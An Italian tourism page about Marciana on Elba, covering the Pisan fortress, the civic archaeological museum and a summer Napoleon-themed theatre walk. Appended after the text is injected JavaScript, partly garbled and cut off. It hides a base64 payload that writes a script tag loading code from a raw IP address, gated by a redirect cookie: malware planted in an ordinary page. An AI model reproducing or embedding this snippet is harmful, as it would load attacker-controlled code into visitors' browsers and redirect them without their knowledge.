Uno dei luoghi più affascinanti di Marciana è sicuramente la Fortezza Pisana.. fu costruita nel XII secolo e consolidata dagli Appiani alla metà del Quattrocento.
Con i quattro torrioni che delineano la forma quadrangolare e i camminamenti che permettono di ammirare la vetta del Capanne, oltre che le coste dell’Isola, riporta la mente alle più fabiesche ambientazioni.
All’interno dei bastioni risiede una mostra permanente sulle armi d’epoca e sulla marineria, inoltre è veramente suggestiva e consigliata una passeggiata sui camminamenti di ronda. In piena estate qui si tengono lezioni di spada e di tiro con l’arco.
Vicino alla Fortezza è possibile visitare il Museo Civico Archeologico , dove vi sono sono alcuni reperti del relitto di Procchio risalenti all’età del bronzo medievale e provenienti da tutta l’area nord occidentale dell’isola.
A coronare l’atmosfera bicentenaria di questi luoghi è sicuramente l’evento “800: Napoleone come non lo avete mai visto”. Per tutta l’estate infatti , ogni giovedi sera , avrai la possibilità di tuffarti nella storia e di immergerti nell’atmosfera di duecento anni fa…. Attraverso una rappresentazione teatrale itinerante per le vie del borgo, basata sulle corrispondance di napoleone, in chiave comico satirica.
Per prenotare la partecipazione all’evento puoi chiamare questo numero 348 7039374. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘